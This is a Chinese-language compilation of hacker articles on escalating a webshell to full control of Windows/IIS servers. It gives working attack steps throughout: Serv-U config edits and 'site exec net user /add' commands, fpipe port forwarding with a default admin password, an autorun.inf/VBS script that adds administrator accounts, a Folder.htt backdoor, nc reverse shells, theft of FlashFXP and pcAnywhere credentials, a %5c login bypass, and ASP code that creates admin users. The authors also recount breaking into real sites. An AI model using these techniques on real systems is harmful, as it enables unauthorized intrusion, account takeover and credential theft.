webshell權(quán)限提升技巧

更新時(shí)間：2007年02月09日 00:00:00 作者：

WEBSHELL權(quán)限提升技巧

c: d: e:.....
C:\Documents and Settings\All Users\「開始」菜單\程序\
看這里能不能跳轉(zhuǎn)，我們從這里可以獲取好多有用的信息比如Serv-U的路徑，
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳轉(zhuǎn)到這個(gè)目錄，如果行那就最好了，直接下它的CIF文件，破解得到pcAnywhere密碼，登陸
c:\Program Files\serv-u\
C:\WINNT\system32\config\
下它的SAM，破解密碼
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制，很多時(shí)候沒作限制，把提升權(quán)限的工具上傳上去，然后執(zhí)行
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\
C:\Documents and Settings\All Users\
c:\winnt\system32\inetsrv\data\
c:\Program Files\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(如果服務(wù)器支持PHP）
c:\PHP(如果服務(wù)器支持PHP）
運(yùn)行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權(quán)限
還可以用這段代碼試提升，好象不是很理想的
如果主機(jī)設(shè)置很變態(tài)，可以試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啟動(dòng)"寫入bat，vbs等木馬。
根目錄下隱藏autorun.inf
C:\PROGRAM FILES\KV2004\ 綁
D:\PROGRAM FILES\RISING\RAV\
C:\Program Files\Real\RealServer\
rar
Folder.htt與desktop.ini
將改寫的Folder.htt與desktop.ini，還有你的木馬或者是VBS或者是什么，放到對方管理員最可能瀏覽的目錄下
replace 替換法捆綁
腳本編寫一個(gè)啟動(dòng)/關(guān)機(jī)腳本重起
刪SAM :( 錯(cuò)
CAcls命令
FlashFXP文件夾Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak

Ring的權(quán)限提升21大法！
以下全部是本人提權(quán)時(shí)候的總結(jié) 很多方法至今沒有機(jī)會(huì)試驗(yàn)也沒有成功，但是我是的確看見別人成功過

的。本人不才，除了第一種方法自己研究的，其他的都是別人的經(jīng)驗(yàn)總結(jié)。希望對朋友有幫助！

1.radmin連接法

條件是你權(quán)限夠大，對方連防火墻也沒有。封裝個(gè)radmin上去，運(yùn)行，開對方端口，然后radmin上去

。本人從來米成功過。，端口到是給對方打開了。

2.paanywhere

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這里下他的GIF

文件，在本地安裝pcanywhere上去

3.SAM破解

C:\WINNT\system32\config\ 下他的SAM 破解之

4.SU密碼奪取

C:\Documents and Settings\All Users\「開始」菜單\程序\

引用：Serv-U，然后本地查看屬性，知道路徑后，看能否跳轉(zhuǎn)
進(jìn)去后，如果有權(quán)限修改ServUDaemon.ini，加個(gè)用戶上去，密碼為空
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYvalues=
這個(gè)用戶具有最高權(quán)限，然后我們就可以ftp上去 quote site exec xxx 來提升權(quán)限

5.c:\winnt\system32\inetsrv\data\

引用：就是這個(gè)目錄，同樣是erveryone 完全控制，我們所要做的就是把提升權(quán)限的工具上傳上去，

然后執(zhí)行

6.SU溢出提權(quán)

這個(gè)網(wǎng)上教程N(yùn)多不詳細(xì)講解了

7.運(yùn)行Csript

引用：運(yùn)行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提

升權(quán)限
用這個(gè)cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特權(quán)的dll文件：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再將asp.dll加入特權(quán)一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機(jī)子放的位置不一定一樣)
我們現(xiàn)在加進(jìn)去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"

"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"

"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32

\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進(jìn)去了

8.腳本提權(quán)

c:\Documents and Settings\All Users\「開始」菜單\程序\啟動(dòng)"寫入bat，vbs

9.VNC

這個(gè)是小花的文章 HOHO

默認(rèn)情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password

我們可以用vncx4

破解它，vncx4使用很簡單，只要在命令行下輸入

c:\>vncx4 -W

然后順序輸入上面的每一個(gè)十六進(jìn)制數(shù)據(jù)，沒輸完一個(gè)回車一次就行了。

10.NC提權(quán)

給對方來個(gè)NC 但是條件是你要有足夠的運(yùn)行權(quán)限然后把它反彈到自己的電腦上 HOHO OK了

11.社會(huì)工程學(xué)之GUEST提權(quán)
很簡單查看他的擁護(hù) 一般來說看到帳戶以后密碼盡量猜可能用戶密碼一樣也可能是他QQ號郵

箱號手機(jī)號盡量看看 HOHO

12.IPC空連接

如果對方真比較白癡的話掃他的IPC 如果運(yùn)氣好還是弱口令

13.替換服務(wù)

這個(gè)不用說了吧？個(gè)人感覺相當(dāng)復(fù)雜

14.autorun .inf

autorun=xxx.exe 這個(gè)=后面自己寫 HOHO 加上只讀、系統(tǒng)、隱藏屬性傳到哪個(gè)盤都可以的不相信

他不運(yùn)行

15.desktop.ini與Folder.htt

引用：首先，我們現(xiàn)在本地建立一個(gè)文件夾，名字不重要，進(jìn)入它，在空白處點(diǎn)右鍵，選擇"自定義

文件夾"（xp好像是不行的）一直下點(diǎn)，默認(rèn)即可。完成后，你就會(huì)看到在此目錄下多了兩個(gè)名為Folder

setting的文件架與desktop.ini的文件，（如果你看不到，先取消"隱藏受保護(hù)的操作系統(tǒng)文件"）然后

我們在Folder setting目錄下找到Folder.htt文件，記事本打開，在任意地方加入以下代碼： <OBJECT

ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后門文件名">

</OBJECT> 然后你將你的后門文件放在Folder setting目錄下，把此目錄與desktop.ini一起上傳到對方

任意一個(gè)目錄下，就可以了，只要等管理員瀏覽了此目錄，它就執(zhí)行了我們的后門

16.su覆蓋提權(quán)

本地安裝個(gè)su，將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉，重

起一下Serv-U，于是你上面的所有配置都與他的一模一樣了

17.SU轉(zhuǎn)發(fā)端口

43958這個(gè)是 Serv －U 的本地管理端口。FPIPE.exe上傳他，執(zhí)行命令： Fpipe –v –l 3333 –r

43958 127.0.0.1 意思是將4444端口映射到43958端口上。然后就可以在本地安裝一個(gè)Serv-u，新建一個(gè)

服務(wù)器，IP填對方IP，帳號為LocalAdministrator 密碼為#1@$ak#.1k;0@p 連接上后你就可以管理他的

Serv-u了

18.SQL帳戶密碼泄露

如果對方開了MSSQL服務(wù)器，我們就可以通過用SQL連接器加管理員帳號（可以從他的連接數(shù)據(jù)庫的

ASP文件中看到），因?yàn)镸SSQL是默認(rèn)的SYSTEM權(quán)限。

引用：對方?jīng)]有刪除xp_cmdshell 方法：使用Sqlexec.exe，在host 一欄中填入對方IP，User與Pass

中填入你所得到的用戶名與密碼。format選擇xp_cmdshell"%s"即可。然后點(diǎn)擊connect，連接上后就可

以在CMD一欄中輸入你想要的CMD命令了

19.asp.dll

引用：因?yàn)閍sp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機(jī)子放的位置不一定相同

)
我們現(xiàn)在加進(jìn)去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"

"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"

"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32

\inetsrv\asp.dll"
好了,現(xiàn)在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進(jìn)去
了,注意,用法中的get和set,一個(gè)是查看一個(gè)是設(shè)置.還有就是你運(yùn)行上面的你要到

C:\Inetpub\AdminScripts>這個(gè)目錄下.
那么如果你是一個(gè)管理員,你的機(jī)子被人用這招把a(bǔ)sp提升為system權(quán)限,那么,這時(shí),防的方法就是把

asp.dll T出特權(quán)一族,也就是用set這個(gè)命令,覆蓋掉剛才的那些東東.

20.Magic Winmail

前提是你要有個(gè)webshell 引用：http://www.eviloctal.com/forum/read.php?tid=3587這里去看吧

21.DBO……

其實(shí) 提升權(quán)限的方式很多的就看大家怎么利用了 HOHO 加油吧將服務(wù)器控制到底！

感謝noangel
WEBSHELL權(quán)限提升
動(dòng)網(wǎng)上傳漏洞，相信大家拿下不少肉雞吧，但是都是WEBSHELL，不能拿到系統(tǒng)權(quán)限，要如何拿到系統(tǒng)權(quán)限呢？這正是我們這次要討論的內(nèi)容
OK，進(jìn)入我的WEBSHELL
啊哈，不錯(cuò)，雙CPU，速度應(yīng)該跟的上，不拿下你我怎么甘心啊
輸入密碼，進(jìn)入到里面看看，有什么好東西沒有，翻了下，好像也沒有什么特別的東西，看看能不能進(jìn)到其他的盤符，點(diǎn)了下C盤，不錯(cuò)不錯(cuò)，可以進(jìn)去，這樣提升就大有希望了
一 serv－u提升
OK，看看他的PROGRAME里面有些什么程序，哦，有SERV-U，記得有次看到SERV-U有默認(rèn)的用戶名和密碼，但是監(jiān)聽的端口是43958，而且是只有本地才能訪問的，但是我們有端口轉(zhuǎn)發(fā)工具的啊，不怕。先看看他的SERV-U的版本是多少，telnet XXX.XXX.XXX.XXX 21
顯示竟然是3.0的，唉，不得不說這個(gè)管理員真的不稱職。后來完畢后掃描了下，也只有FTP的洞沒有補(bǔ)。既然是這樣，我們就開始我們的提升權(quán)限了
上傳FPIPE，端口轉(zhuǎn)發(fā)工具，圖三
在運(yùn)行CMD命令里輸入d:\\wwwroot\\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本機(jī)的43598端口轉(zhuǎn)發(fā)到81端口
然后打開我們自己機(jī)子上的SERV-U，點(diǎn)Serv－U服務(wù)器，點(diǎn)菜單欄上的的服務(wù)器，點(diǎn)新建服務(wù)器，然后輸入IP，輸入端口，記得端口是剛剛我們轉(zhuǎn)發(fā)的81端口。服務(wù)名稱隨便你喜歡，怎么樣都行。然后是用戶名：LocalAdministrator 密碼：#l@$ak#.lk;0@P (密碼都是字母)
確定，然后點(diǎn)剛剛建的服務(wù)器，然后就可以看到已有的用戶，自己新建一個(gè)用戶，把所有權(quán)限加上。也不鎖定根目錄
接下來就是登陸了，登陸FTP一定要在CMD下登陸，
進(jìn)入后一般命令和DOS一樣，添加用戶的時(shí)候
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add
如果對方開了3389的話，就不用我教你怎么做了，沒開的話，新建立IPC連接，在上傳木馬或者是開啟3389的工具
二
auto.ini 加 SHELL.VBS

autorun.inf
[autorun]
open=shell.vbs
shell.vbs
dim wsh
set wsh=createObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
但是這樣要可以訪問到對方的根目錄。將這兩個(gè)文件放到對方硬盤的根目錄下。當(dāng)然你也可以直接執(zhí)行木馬程序，還要一個(gè)木馬程序，但是語句就和最后兩句一樣，通過CMD執(zhí)行木馬程序
三
Folder.htt與desktop.ini
將改寫的Folder.htt與desktop.ini，還有你的木馬或者是VBS或者是什么，放到對方管理員最可能瀏覽的目錄下，覺得一個(gè)不夠，可以多放幾個(gè)
Folder.htt添加代碼
<OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后門文件名">
</OBJECT>
但是后門和這兩個(gè)文件必須要放到一塊，有點(diǎn)問題，可以結(jié)合啟動(dòng)VBS，運(yùn)行結(jié)束后，刪除上傳的后門.就是CODEBASE="shell.vbs".shell寫法如上

四
replace
替換法，可以替換正在執(zhí)行的文件。用這個(gè)幾乎可以馬上得到權(quán)限，但是我沒有做過試驗(yàn)，可以試下，將對方正在執(zhí)行的文件替換為和它文件名一樣的，捆綁了木馬的。為什么不直接替換木馬呢？如果替換的是關(guān)鍵程序，那不是就直接掛了？所以還是捆綁好點(diǎn)
格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A]

[/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2]

[/R] [/S] [/W]

　[drive1:][path1]filename 指定源文件。
　[drive2:][path2] 指定要替換文件的
　　　　　　　　　　　　　目錄。
　/A 把新文件加入目標(biāo)目錄。不能和
　　　　　　　　　　　　　 /S 或 /U 命令行開關(guān)搭配使用。
　/P 替換文件或加入源文件之前會(huì)先提示您
　　　　　　　　　　　　　進(jìn)行確認(rèn)。
　/R 替換只讀文件以及未受保護(hù)的
　　　　　　　　　　　　　文件。
　/S 替換目標(biāo)目錄中所有子目錄的文件。
　　　　　　　　　　　　　不能與 /A 命令選項(xiàng)
　　　　　　　　　　　　　搭配使用。
　/W 等您插入磁盤以后再運(yùn)行。
　/U 只會(huì)替換或更新比源文件日期早的文件。
　　　　　　　　　　　　　不能與 /A 命令行開關(guān)搭配使用
這個(gè)命令沒有試驗(yàn)過，看能不能替換不能訪問的文件夾下的文件，大家可以試驗(yàn)下
五
腳本
編寫一個(gè)啟動(dòng)/關(guān)機(jī)腳本配置文件scripts.ini，這個(gè)文件名是固定的，不能改變。內(nèi)容如下：

[Startup]
0CmdLine=a.bat
0Parameters=

將文件scripts.ini保存到"C:\\winnt\\system32\\GroupPolicy\\Machine\\Scripts"
A.BAT的內(nèi)容可以是NET USER yonghu mima
也可以是NET USER ADMINistrator XXX
這樣可以恢復(fù)你想要得任意用戶名的密碼，也可以自己增加新的用戶，但是要依賴重啟，還有就是對SYSTEM32有寫的權(quán)限
六
SAM
如果可以訪問對方的SYSTEM32的話，刪除對方的SAM文件，等他重啟以后就是ADMIN用戶密碼為空
突然又有了想法，可以用REPLACE命令替換的嗎，可以把你的SAM文件提取出來，上傳到他的任意目錄下，然后替換。不過不知道如果對SYSTEM32沒有權(quán)限訪問的話，能不能實(shí)現(xiàn)替換

--

--
使用FlashFXP來提升權(quán)限最近各位一定得到不少肉雞吧:)，從前段時(shí)間的動(dòng)網(wǎng)的upfile漏洞，動(dòng)力文章系統(tǒng)最新漏洞到first see發(fā)現(xiàn)的動(dòng)網(wǎng)sql版本的一個(gè)超級大漏洞。有人一定忙的不易樂乎，大家的方法也不過是使用一下asp腳本的后門罷了。至于提升權(quán)限的問題呵呵，很少有人能作一口氣完成。關(guān)鍵還是在提升權(quán)限上做個(gè)問題上，不少服務(wù)器設(shè)置的很BT，你的asp木馬可能都用不了，還那里來的提升啊。我們得到webshell也就是個(gè)低級別的用戶的權(quán)限，各種提升權(quán)限方法是可謂五花八門啊，如何提升就看你自己的妙招了。
其一，如果服務(wù)器上有裝了pcanywhere服務(wù)端，管理員為了便于管理也給了我們方便，到系統(tǒng)盤的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下載*.cif本地破解就使用pcanywhere連接就ok了。
其二，如果對方有Serv-U大家不要罵我啊，通過修改ServUDaemon.ini和fpipe這軟件提升權(quán)限應(yīng)該是不成問題吧。
其三，通過替換系統(tǒng)服務(wù)來提升。
其四，查找conn和config這類型的文件看能否得到sa或者mysql的相關(guān)密碼，可能會(huì)有所收獲等等。
本人在一次無聊的入侵過程中發(fā)現(xiàn)了這個(gè)方法，使用Flashfxp也能提升權(quán)限，但是成功率高不高就看你自己的運(yùn)氣了:)
本人www.xxx.com 通過bbs得到了一個(gè)webshell，放了個(gè)小馬(現(xiàn)在海陽的名氣太大了偶不敢放)，而且已經(jīng)將一段代碼插入了N個(gè)文件中，夠黑吧。提升權(quán)限沒時(shí)間做。在我放假回家后，一看我暈bbs升級到動(dòng)網(wǎng)sp2了我放的小馬也被K了，人家的BBS是access版本的。郁悶啊！突然想起我將一個(gè)頁面插入了asp的后門，看看還有沒有希望了。輸www.xxx.com/xx.asp?id =1 好家伙，還在！高興ing
圖1
于是上傳了一個(gè)asp的腳本的后門，怎么提升權(quán)限呢?
在這個(gè)網(wǎng)站的主機(jī)上游蕩了N分鐘，在C:\\ Program Files下發(fā)現(xiàn)了FlashFXP文件夾(跟我一樣使用這個(gè)軟件自己心里暗想)圖2，于是就打了了Sites. dat這個(gè)文件(編輯)這是什么東西密碼和用戶名，而且密碼是加了密的。
如果我把這些文件copy回本地也就是我的計(jì)算機(jī)中，替換我本地的相應(yīng)文件會(huì)怎么樣呢?
于是我就將Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak幾個(gè)文件下載到我的計(jì)算機(jī)中替換了我電腦中flashfxp文件夾的相應(yīng)文件。打開flashfxp 在站點(diǎn)中打開站點(diǎn)管理器一項(xiàng)。乖乖發(fā)財(cái)了
對方管理員通過flashfxp連接的各個(gè)站點(diǎn)都在圖3，點(diǎn)擊連接。通過了于是我們又有了一堆肉雞，我們有ftp權(quán)限。上傳腳本木馬~ 呵呵。
說了半天這提升權(quán)限的事情一點(diǎn)沒講啊
不要急，大家看看對方管理員的這站點(diǎn)管理器，有用戶名和密碼，密碼是星號的?？上О?！
又想起了在Sites.dat中也顯示了密碼和用戶名，而且密碼是加密的。
現(xiàn)在的星號密碼會(huì)不會(huì)也是加了密的?看看就行了唄。
怎么看? 菜鳥了吧手頭有個(gè)不錯(cuò)的查看星號的軟件，就是xp星號密碼查看器，通過查看跟Sites.dat中加密了密碼做比較。看圖4和圖5 的比較很顯然在站點(diǎn)管理器中查看到的密碼是明文顯示的。發(fā)財(cái)了吧
下一步就是使用xp星號密碼查看器這個(gè)軟件來提取密碼和用戶名?？凑哌@些復(fù)雜的密碼，還真有點(diǎn)懷念當(dāng)年玩sniff的時(shí)光。呵呵
密碼為:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+
用戶名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69
(上述部分密碼和用戶名已經(jīng)作了必要的修改)
這么多的信息，按社會(huì)工程學(xué)的概念來說，沒有管理員的密碼。打死我也不相信。最終我得到了這個(gè)網(wǎng)站管理員的密碼從這堆東西中找到的。
我想這個(gè)問題應(yīng)該反饋到flashfxp官方，讓他們在下個(gè)版本中修正這個(gè)漏洞或者說是錯(cuò)誤。經(jīng)過后來測試只要把含有密碼和用戶名的Sites.dat文件替換到本地相應(yīng)的文件就可以在本地還原對方管理員的各個(gè)站點(diǎn)的密碼。希望大家在入侵的時(shí)候遇到fla shfxp的時(shí)候能想到這個(gè)方法，至少也可以得到一堆新的肉雞。不防試試?希望能給大家滲透帶來幫助。

--
--
將asp權(quán)限提到最高by: cnqing from:http://friend.91eb.com
本來是要寫個(gè)提權(quán)asp木馬的，可惜時(shí)間不是太多功底也不是太深。先把原理方法告訴大家好了。簡單說說，說的太麻煩沒有必要。懂了就行。
原理：
asp文件的教本解釋是由asp.dll運(yùn)行的。由dllhost.exe啟動(dòng)的。身分是IWAN_NAME。若是把a(bǔ)sp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接啟動(dòng)。身份是system
方法：
第一步。
得到inprocesslsapiapps內(nèi)容，用命令"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"。將得到的一組dll復(fù)制下來。
第二步
寫一個(gè)bat內(nèi)容為"cscript C:\\Inetpub\\AdminScripts\\adsutil vbs set w3svc/inprpocessisapiapps "C:\\Inetpub\\AdminScripts\\asp.dll" ·····
省略號為復(fù)制下的內(nèi)容。中間用空格分開不要帶回車符
最后運(yùn)行這個(gè)bat就行了。
例如：
我用"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"得到
"c:\\winnt\\system32\\inetsrv\\httpext.dll"
"c:\\winnt\\system32\\inetsrv\\httpodbc.dll"
"C:\\WINNT\\system32\\inetsrv\\ssinc.dll"
"C:\\WINNT\\System32\\msw3prt.dll"
"C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_aut\\author.dll"
"C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_adm\\admin.dll"
"C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\shtml.dll"

那么你的bat就應(yīng)該是：

cscript C:\\Inetpub\\AdminScripts\\adsutil vbs set w3svc/inprpocessisapiapps "C:\\Inetpub\\AdminScripts\\asp.dll" "c:\\winnt\\system32\\inetsrv\\httpext.dll" "c:\\winnt\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\System32\\msw3prt.dll" "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_aut\\author.dll" "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_adm\\admin.dll" "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\shtml.dll"

已測試成功！！

--------------------------------------------------------------------------------

--

--
利用%5c繞過驗(yàn)證
利用%5c繞過驗(yàn)證

---------------------------------------
lake2（http://mrhupo.126.com）
2004-11-27
---------------------------------------

說到%5c，你是不是想起了當(dāng)前流行的那個(gè)%5c暴庫漏洞，呵呵，本文就是對%5c利用的探索（呵呵，當(dāng)然有我提出的新東東，或許對你有幫助哦^_^）。

好，我們先追根溯源，找到那個(gè)漏洞的老底?？纯淳G盟2001年的漏洞公告：http://www.nsfocus.net/index.php?ac...iew&bug_id=1429

N年以前利用這個(gè)漏洞可以實(shí)現(xiàn)目錄遍歷，雖然微軟出了補(bǔ)丁，不過好像補(bǔ)丁是用來限制iis只能訪問虛擬目錄的，所以漏洞還是存在，只不過利用方式變了。對iis來說，提交一個(gè)含有%5c的url能夠找到文件，但是該文件里以相對路徑引用的其他文件卻找不到了（%5c是\\的url編碼，iis跳轉(zhuǎn)到上一級目錄去找，當(dāng)然找不到；頭暈了吧，哈哈，我也頭暈啊）。

后來這個(gè)漏洞就被牛人挖掘出來了，也就是傳說中的%5c暴庫：由于連接數(shù)據(jù)庫的文件引用的相對路徑，提交%5c找不到文件，所以導(dǎo)致出錯(cuò)，iis就會(huì)老老實(shí)實(shí)的說出數(shù)據(jù)庫的路徑（不明白？找google）。

一個(gè)偶然的機(jī)會(huì)我發(fā)現(xiàn)還可以利用%5c繞過asp的驗(yàn)證；當(dāng)我們暴庫失敗的時(shí)候不妨試試。

廢話少說，看下面的代碼：


<%
guest_user=trim(request("guest_user"))
guest_password=trim(request("guest_password"))
Set rs= Server.createObject("ADODB.Recordset")
sql="select * from admin where id=1"
rs.open sql,conn,3,2
readuser=rs("guest_user")
readpassword=rs("guest_password")
if readuser<>guest_user or readpassword<>guest_password then
response.write "請輸入正確地管理員密碼！"
response.end
else
session("admin")=1 \'登陸后寫入seesion中保存
response.write("登陸成功，請返回信息頁")
end if
%>

看到?jīng)]有，要想通過驗(yàn)證必須讓數(shù)據(jù)庫里的用戶名密碼與提交的一致；想到什么？讓我們再看看數(shù)據(jù)庫連接文件代碼：

<%
on error resume next
set conn=server.createobject("adodb.connection")
DBPath = Server.MapPath("guestbook.asp")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
%>

啊，有容錯(cuò)語句不能暴庫！等等，如果提交%5c數(shù)據(jù)庫找不到，由于容錯(cuò)，所以程序會(huì)繼續(xù)執(zhí)行，那么說來從數(shù)據(jù)庫得到的用戶名密碼皆為空（想想有時(shí)暴庫失敗是不是看到空空的框架，因?yàn)閿?shù)據(jù)都是空嘛），哈哈，這樣我們就繞過驗(yàn)證了！

知道怎么做了吧，把登陸頁面保存到本地，修改提交的url，把最后一個(gè)/改成%5c，用戶名密碼用空格（有的程序會(huì)檢查用戶名密碼是否為空，空格會(huì)被程序過濾），提交，就ok了。

誒，各位不要以為我自己沒事寫段代碼來搗鼓，實(shí)際上這個(gè)是我們學(xué)校一個(gè)高手做的留言板程序，就掛在學(xué)校的主頁，呵呵。

既然弄懂了原理，當(dāng)然要找實(shí)際漏洞啦，自然是拿大名鼎鼎的"洞"網(wǎng)論壇開刀。不過失敗了，因?yàn)樗臄?shù)據(jù)庫連接文件里有這么一段：

If Err Then
err.Clear
Set Conn = Nothing
Response.Write "數(shù)據(jù)庫連接出錯(cuò)，請檢查連接字串。"
Response.End
End If

數(shù)據(jù)庫找不到程序就結(jié)束了，呵呵，空歡喜一場。

接著又去down了bbsxp論壇，打開數(shù)據(jù)庫連接文件，暈，根本沒有容錯(cuò)語句；呵呵，不過可以暴庫哦。

我又不是BT，所以不去找事了，寫篇文章，算是給各位高手提供資料吧。

總結(jié)一下這個(gè)攻擊方法成功的條件：1、數(shù)據(jù)庫連接用的相對路徑且僅有簡單的容錯(cuò)語句；2、服務(wù)器iis版本為4或5；3、程序里不檢查空字符或者檢查時(shí)不過濾空格而比較時(shí)過濾空格；4、程序不能在一級目錄

至于防范，呵呵，既然攻擊條件知道了，防范措施自然也出來了^_^

--------------------------------------------------------------------------------

--

--
添加超級用戶的.asp代碼[藍(lán)屏的原創(chuàng),凱文改進(jìn),Ms未公布的漏洞]

作者：藍(lán)屏,凱文文章來源：冰點(diǎn)極限

其實(shí)上個(gè)禮拜我和凱文就在我的肉雞上測試了,還有河馬史詩.結(jié)果是在user權(quán)限下成功添加Administrators組的用戶了(雖然我不敢相信我的眼睛).
上次凱文不發(fā)話,我不敢發(fā)布啊....現(xiàn)在在他的blog 上看到他發(fā)布了,就轉(zhuǎn)來了咯(比我上次測試時(shí)還改進(jìn)了一點(diǎn),加了個(gè)表單).這下大家有?？ー``

反正代碼是對的，但是很少能成功，具體的看運(yùn)氣了。。呵呵，下一步我想把他整合到海洋里面去。嘿嘿。

<head>.network對象腳本權(quán)限提升漏洞利用工具</head>
<form action="useradd.asp" method=post>
用戶:<input name="username" type="text" value="kevin1986"><br>
密碼:<input name="passwd" type="password"><br>
<input type="submit" value="添加">
</form>

<%@codepage=936
on error resume next
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
response.write "iP !s n0T RiGHt"
else
if request("username")<>"" then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",username)
od.SetPassword passwd
od.SetInfo
oe.Add oz&"/"&username
if err then
response.write "哎~~今天你還是別買6+1了……省下2元錢買瓶可樂也好……"
else
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登錄")>0 then
response.write "雖然沒有錯(cuò)誤,但是好象也沒建立成功.你一定很郁悶吧"
else
Response.write "OMG!"&username&"帳號居然成了!這可是未知漏洞啊.5,000,000RMB是你的了"
end if
end if
else
response.write "請輸入輸入用戶名"
end if
end if
%>
如何繞過防火墻提升權(quán)限

本文講的重點(diǎn)是webshell權(quán)限的提升和繞過防火墻，高手勿笑。

廢話少說，咱們進(jìn)入正題。

首先確定一下目標(biāo)：http://www.sun***.com ，常見的虛擬主機(jī)。利用Upfile的漏洞相信大家獲得webshell不難。我們這次獲得這個(gè)webshell，不是DVBBS，而是自由動(dòng)力3.6的軟件上傳過濾不嚴(yán)。網(wǎng)站http://www.sun***.com/lemon/Index.asp是自由動(dòng)力3.6文章系統(tǒng)。Xr運(yùn)用WinHex.exe和WSockExpert.exe上傳一個(gè)網(wǎng)頁木馬newmm.asp，用過動(dòng)鯊的door.exe的人都知道，這個(gè)是上傳asp木馬內(nèi)容的。于是，上傳海洋2005a，成功獲得webshell。

測試一下權(quán)限，在cmd里運(yùn)行set，獲得主機(jī)一些信息，系統(tǒng)盤是D盤，也說明了我們的webshell有運(yùn)行權(quán)限的。那我們看看C盤有什么呢？難道是雙系統(tǒng)？瀏覽后發(fā)現(xiàn)沒有什么系統(tǒng)文件，只有一些垃圾文件，暈死。沒關(guān)系，再來檢查一下，虛擬主機(jī)都有serv-u的，這臺也不例外，是5.0.0.8的。呵呵，是有本地溢出的呀，挖哈哈。

思路：上傳serv-u本地溢出文件srv.exe和nc.exe利用nc來反連接獲得系統(tǒng)shell。大家是不是發(fā)現(xiàn)海洋2005a那個(gè)上傳的組件不好用（反正我總遇到這個(gè)問題），沒關(guān)系，用rain改的一個(gè)無組件上傳，一共有3個(gè)文件，up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上傳到同一個(gè)文件夾，up.htm是本地用的，修改up.htm里的鏈接地址為：http://www.sun***.com/lemon/upload.asp就可以上傳了。

傳上了srv.exe和nc.exe在H:\\long\\sun***\\lemon（網(wǎng)站目錄）后，發(fā)現(xiàn)沒有運(yùn)行權(quán)限。沒關(guān)系，根據(jù)經(jīng)驗(yàn)，一般系統(tǒng)下D:\\Documents and Settings\\All Users\\是應(yīng)該有運(yùn)行權(quán)限的。于是想把文件copy過去，但是發(fā)現(xiàn)我們的webshell沒有對D盤寫的權(quán)限，暈死。

可以瀏覽D:\\program files\\serv-u\\ServUDaemon.ini,不能改，難道要破解serv-u的密碼，暈，不想。

